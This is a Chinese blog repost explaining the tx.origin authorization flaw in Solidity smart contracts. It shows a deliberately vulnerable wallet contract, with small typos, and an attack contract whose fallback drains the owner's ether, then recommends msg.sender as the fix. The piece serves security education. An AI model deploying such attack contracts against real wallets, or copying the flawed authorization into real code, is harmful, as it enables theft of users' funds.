智能合约漏洞——通过tx.origin授权(Authorization Through tx.origin)

最新推荐文章于 2024-09-13 17:39:58 发布
最新推荐文章于 2024-09-13 17:39:58 发布
阅读量21 收藏
点赞数
分类专栏: 智能合约漏洞 文章标签: 智能合约 区块链 安全
原文链接:https://github.com/kadenzipfel/smart-contract-vulnerabilities?tab=readme-ov-file
版权

通过tx.origin授权(Authorization Through tx.origin)

  tx.origin(原始交易发起者的外部地址)是一个全局变量,它返回发送交易的地址。重要的是千万不要使用tx.origin,因为另一个合约会使用fallback函数来调用你的合约并获得授权,授权地址存储在tx.origin中。

  考虑以下案例,首先你部署了一个TxUserWallet合约:

// This contract contains a bug - do not use
contract TxUserWallet {
    address owner;

    constructor() public {
        owner = msg.sender;
    }

    function transferTO(address payable dest, uint amount) public {
        require(tx.origin == owner);
        dest.transfer(amonut);
    }
}

  上述我们可以看出TxUserWallet通过tx.origin授权了transferTO()。

  然后是攻击合约TxAttackWallet:

interface TxUserWallet {
    function transferTo(address payable dest, uint amount) external;
}

contract TxAttackWallet {
    address payable owner;

    constructor() public {
        owner = msg.sender;
    }

    function() external {
        TxUserWallet(msg.sender).transferTo(owner, msg.sender.balance);
    }
}

  如果有人现在欺骗你向TxAttackWallet合约地址发送ETH,攻击者可以检查tx.origin找到发送交易的地址来窃取你的资金。

  所以为了防止这种攻击的发生,一般使用msg.sender。

势必 挖到漏洞
关注
专栏目录
智能合约漏洞攻击事件_智能合约百科全书攻击漏洞
weixin_26747751的博客
09-14 6219
智能合约漏洞攻击事件Applications on Ethereum manage financial value, making security absolutely crucial. As a nascent, experimental technology, smart contracts have certainly had their fair share of attacks. 以太...
智能合约攻击和漏洞百科全书 Vulnerabilities----starting this section
ljh1528207303的博客
05-30 583
在 Solidity 中,您可以使用低级调用,例如 address.call()、address.callcode()、address.delegatecall() 和 address.send(),也可以使用合约调用,例如 ExternalContract.doSomething( ). 低级调用永远不会抛出异常——相反,如果遇到异常,它们将返回 false,而合约调用将自动抛出。非正式地说,assert() 是一个过于自信的保镖,它保护你的合约,但在这个过程中偷走了你的汽油。然而,事实并非如此。
mythril:对应swc错误类型源码
小楼一夜听春雨
11-02 300
妙啊,终于有一个py脚本我完全看懂了 """This module maps SWC IDs to their registry equivalents.""" DEFAULT_FUNCTION_VISIBILITY = "100" INTEGER_OVERFLOW_AND_UNDERFLOW = "101" OUTDATED_COMPILER_VERSION = "102" FLOATING_PRAGMA = "103" UNCHECKED_RET_VAL = "104" UNPROTECTED_ET
syslog.conf配置文件详解
czc1009的专栏
09-29 9645
LINUX保存了系统中所发生事件的详细记录,这些记录称作日志文件或消息文件.可以查阅日志文件来确定系统当前状态,观察入侵者踪迹,寻找某特定程序(或事件)相关的数据.         syslogd与klogd(监控linux内核提交的消息)守护进程负责记录,发送系统或工具产生的信息,二者的配置文件都是/etc/syslog.conf.当系统内核或工具产生信息时,通过调用相关函数将信息发送到sys
CISCO技术(1.7万)
热门推荐
08-09 6万+
0 base|以零为基底\r\n 0 disturbed zero output signal|干扰0输出信号\r\n 0parallel communication cable|平行通讯传输缆线\r\n 1 binary operation|二进制运算\r\n 1 di
activiti中的bug列表
分享牛
11-21 2万+
分享牛原创(尊重原创 转载对的时候第一行请注明,转载出处来自分享牛http://blog.csdn.net/qq_30739519)Bug[ACT-1968] - Custom Database schema on PostgreSQL not working[ACT-4113] - REST Task API Not working: /service/runtime/tasks?assigne
【数据集】计算机视觉,深度学习,数据挖掘数据集整理
c20081052的专栏
04-04 2万+
  金融美国劳工部统计局官方发布数据上证A股日线数据,1999.12.09 至 2016.06.08,前复权,1095支股票深证A股日线数据,1999.12.09 至 2016.06.08,前复权,1766支股票深证创业板日线数据,1999.12.09 至 2016.06.08,前复权,510支股票MT4平台外汇交易历史数据Forex平台外汇交易历史数据几组外汇交易逐笔(Ticks)数据美国股票新...
智能合约常见10个漏洞
sinat_34996559的博客
01-03 2484
1. Reentrancy also known as or related torace to empty,recursive call vulnerability,call to the unknown This exploit was missed in review so many times by so many different people: reviewers tend to review functions one at a time, and assume that call...
工作中使用到的单词(软件开发)_2023_0316备份
sun0322
03-16 1万+
目录■Java学习汇总■常用链接■2020/03/15 (最初整理 242个单词)2020 6/28 整理2020 6/29 整理2020 7/6 整理■2020 7/23 整理■2020/10/07 以降整理■2020/11/02 以降整理■2020/12/04 以降整理■2020/12/14以降整理■2021/01/01以降整理■2021/02/22以降整理■匿名内部类,lambda表达式,JDK7新特性,等等java相关■2021/03/18以降整理Linux系统性能 相关■其他各种单词,知识(l
【异常】Nacos异常Caused by: com.alibaba.nacos.api.exception.NacosException: authorization failed!
本本本添哥
04-26 2397
新增了Burt这个用户账号密码,准备访问Nacos。
kubernetes访问控制——Authentication认证、Authorization授权、服务账户的自动化
Aimee_c的博客
07-05 2249
文章目录1.kubernetes API 访问控制2. Authentication(认证)1.创建serviceaccount2.添加secrets到serviceaccount3.把serviceaccount和pod绑定起来:4. 创建UserAccount3. Authorization授权)3.1 RBAC(基于角色访问控制授权)介绍3.2 RBAC授权1.创建Role(权限的集合)2. RoleBinding和ClusterRoleBinding3.1 RBAC 1.kubernetes AP
vue 基于axios封装request接口请求——request.js文件
q1ngqingsky的博客
02-15 2万+
axios的封装使用
OAuth2.0中的安全漏洞及避免方法:使用OAuth2.01.0B协议实现
程序员光剑
07-14 2252
作者:禅与计算机程序设计艺术 什么是 OAuth2.0? OAuth(Open Authorization)是一个开放授权标准协议,它允许第三方应用访问用户在某些网站上存储的私密信息,如照片、邮箱、联系方式等。OAuth 是建立在Oauth Core 1.0协议规范之上的一个子协议,该
【加密社】深入理解TON智能合约 (FunC语法)
加密社的博客
09-13 946
在FunC语言中,字典是一种键值对的数据结构,用于存储和检索数据。这里,我们创建了一个名为sdict的空字典。在FunC语言中,列表用于存储一系列元素。这里,我们创建了一个名为l的空列表。通过分析这段TON智能合约代码,我们学习了dict和list在FunC语言中的用法,以及如何在实际场景中实现高效的验证者选举。掌握这些数据结构的操作,对于编写高效的TON智能合约具有重要意义。希望本文能为读者在FunC语言编程之路上提供有益的参考。
智能合约系统DAPP开发
I592O929783的博客
09-08 733
智能合约系统DAPP(去中心化应用)的开发是一个复杂且综合性的过程,它结合了区块链技术、智能合约编程、前端开发以及安全性等多方面的知识和技能。区块链平台:根据项目需求和团队熟悉度,选择适合的区块链平台,如以太坊、EOS、Polkadot等。开发工具:选择合适的开发框架和工具,如Truffle、Hardhat等,这些工具可以帮助开发者更高效地编写、测试和部署智能合约。设计智能合约:明确智能合约的数据结构、状态变量、函数、事件和修饰符等。明确应用场景:首先,需要明确DAPP的应用场景,如金融、游戏、社交等。
如何通俗易懂的解释TON的智能合约
zhuqiyua的博客
09-09 1386
在TON区块链中,如果某个分片链的交易量过大,可以将其分割成更小的分片链,以减轻单个分片的负担。这个比喻中的“中心邮局”对应于英文中的“Masterchain”,它是TON区块链中的一个特殊链,用于同步所有分片链的状态,并确保整个系统能够达成共识。每个智能合约都是一个独立的演员,它们在TON的舞台上演绎着自己的故事,通过消息传递与其他演员互动,共同构建了一个复杂而有序的区块链世界。随着戏剧节的进行,信件的数量越来越多,为了避免信件处理的混乱,小镇的智者决定将广场分成几个区域,每个区域都有自己的信箱管理人。
如何使用智能合约铸造 NFT —— 以 NftMarket 合约为例
Huahua_1223的博客
09-10 1759
NFT 的铸造是将独一无二的数字资产记录在区块链上的过程。本文将通过一个简单的智能合约示例,带你了解如何在以太坊上铸造 NFT,并解释为什么这些 NFT 即便没有被上架,也能在平台(如 OpenSea)上看到。通过本文,我们详细介绍了NFT铸造的过程,并探讨了将铸造和上架分开的重要性。文章从基础概念入手,讲解了NFT的创建流程,特别是在以太坊网络上如何通过智能合约实现安全、透明的铸造。
区块链之变:揭秘Web3对互联网的改变
最新发布
weixin_44672358的博客
09-13 470
区块链游戏作为Web3时代的重要创新,正逐步改变数字文化娱乐的格局。通过去中心化、透明性和自主控制权,玩家获得了前所未有的自由度和参与感。
hadoop.security.authorization=true
07-28
hadoop.security.authorization=true是Hadoop的一个配置选项,用于开启ServiceLevel Authorization。当设置为true时,Hadoop会对用户进行验证,并根据配置的访问控制列表(ACL)来限制用户对Hadoop服务的访问权限。\[1\]这意味着只有被授权的用户才能执行特定的操作,其他用户将被拒绝访问。如果设置为false,则不会进行任何验证,所有用户都将拥有全部权限。\[1\] 要修改hadoop.security.authorization的配置,需要重启Hadoop服务。你可以在Hadoop的配置文件中找到这个选项,并将其值修改为true或false。例如,在hdfs-site.xml文件中,你可以找到以下配置项: <property> <name>hadoop.security.authorization</name> <value>true</value> </property> \[2\] 如果你尝试执行未经授权的操作,你可能会收到类似以下的错误消息: User xxx (auth:SIMPLE) is not authorized for protocol interface org.apache.hadoop.hdfs.protocol.ClientProtocol: denied by configured ACL \[3\] 这表示用户xxx没有被授权执行指定的操作,可能是由于ACL配置的限制导致的。因此,开启ServiceLevel Authorization可以提高Hadoop集群的安全性,确保只有经过授权的用户才能访问和操作Hadoop服务。 #### 引用[.reference_title] - *1* *2* [Hadoop 权限管理](https://blog.csdn.net/iteye_4515/article/details/82435582)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [如何控制 hadoop 的用户访问权限](https://blog.csdn.net/h952520296/article/details/107937020)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值